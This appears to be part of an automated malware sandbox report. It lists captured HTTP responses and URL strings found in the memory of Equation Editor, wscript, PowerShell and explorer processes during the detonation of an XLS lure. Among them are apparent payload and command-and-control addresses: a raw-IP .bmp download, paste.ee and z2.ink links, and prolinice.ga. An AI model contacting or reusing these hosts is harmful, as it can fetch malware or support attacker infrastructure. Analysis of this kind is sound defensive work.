Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 16:35:15 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 16:35:20 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-alive
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 16:36:08 GMTServer: Apache/2.4.59 (Debian)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 64 38 38 0d 0a b9 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3 9c 8d b7 27 5d c1 30 78 b2 34 fc 64 ca 38 5b 03 cf 4b a0 90 08 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 16:36:17 GMTServer: Apache/2.4.59 (Debian)Content-Length: 409Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>

Source: EQNEDT32.EXE, 00000008.00000002.412851161.00000000002EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.46.177.156/8080/lionarekingofjungleimageshere.bmp
Source: EQNEDT32.EXE, 00000008.00000002.412851161.00000000002EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.46.177.156/8080/lionarekingofjungleimageshere.bmpj
Source: explorer.exe, 0000000E.00000002.606049641.00000000026D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.607048894.0000000007987000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://aikpfjvjuwcsxfjs.net/
Source: explorer.exe, 0000000E.00000002.607048894.0000000007987000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://aikpfjvjuwcsxfjs.net/application/x-www-form-urlencodedMozilla/5.0
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.use
Source: explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com
Source: powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: explorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/
Source: explorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 00000012.00000002.526156313.0000000000664000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.509224452.000000000032E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.513249224.0000000000604000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.605434995.00000000002C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.546090227.000000000013E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.605531849.0000000000684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.605475335.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.605633277.0000000000464000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.605402279.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/index.php
Source: explorer.exe, 0000000E.00000002.606049641.00000000026D2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/index.php.
Source: explorer.exe, 00000012.00000002.526156313.0000000000664000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.509224452.000000000032E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.513249224.0000000000604000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.605434995.00000000002C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.546090227.000000000013E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.605531849.0000000000684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.605475335.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.605633277.0000000000464000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.605402279.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
Source: explorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/ndex.php
Source: powershell.exe, 0000000A.00000002.528301367.000000000259A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.454053406.00000000022A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: explorer.exe, 0000000E.00000002.606556935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466925518.000000000797B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.606049641.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.465326275.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466511830.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000E.00000002.606556935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466925518.00000000078D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466925518.000000000797B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.606049641.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.465326275.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466511830.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.607048894.00000000078D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000E.00000002.606049641.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.465326275.000000000260D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerxe
Source: z2.ink.url.4.dr	String found in binary or memory: http://z2.ink/
Source: nXPJ.url.4.dr	String found in binary or memory: http://z2.ink/nXPJ
Source: #20240627_Edlen_A.xls	String found in binary or memory: http://z2.ink/nXPJk
Source: ~DFBC2F112CC991C446.TMP.0.dr, 26330000.0.dr	String found in binary or memory: http://z2.ink/nXPJyX
Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000009.00000003.419004224.000000000089B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.421806402.000000000089B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422008414.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.419004224.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422008414.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/Bo3r4
Source: wscript.exe, 00000009.00000003.419004224.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422008414.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/Bo3r4gj
Source: wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/e
Source: wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/n
Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
